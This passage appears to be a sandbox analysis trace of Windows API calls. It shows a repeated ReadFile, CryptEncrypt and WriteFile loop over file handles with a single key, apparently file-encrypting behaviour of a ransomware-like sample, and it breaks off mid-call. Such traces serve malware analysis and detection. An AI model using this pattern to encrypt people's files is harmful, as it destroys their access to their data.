[0273.644] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.644] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.644] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.644] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.644] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.644] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.644] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.644] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.644] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.644] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.645] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.645] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.645] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.645] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.645] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.645] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.645] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.645] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.645] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.645] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.645] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.645] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.645] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.645] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.645] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.646] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.646] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.646] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.646] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.646] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.646] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.646] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.646] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.646] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.646] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.646] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.646] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.646] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.646] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.646] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.647] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.647] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.647] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.647] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.647] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.647] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.647] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.647] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.647] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.647] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.647] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.647] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.647] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.647] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.647] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.648] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.648] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.648] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.648] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.648] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.648] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.648] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.648] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.648] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.648] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.648] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.648] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.648] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.649] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.649] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.649] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.649] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.649] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.649] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.649] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.649] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.649] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.649] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.649] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.649] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.649] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.649] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.649] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.650] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.650] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.650] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.650] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.650] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.650] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.650] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.650] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.650] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.650] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.650] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.650] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.650] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.650] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.651] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.651] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.651] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.651] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.651] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.651] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, 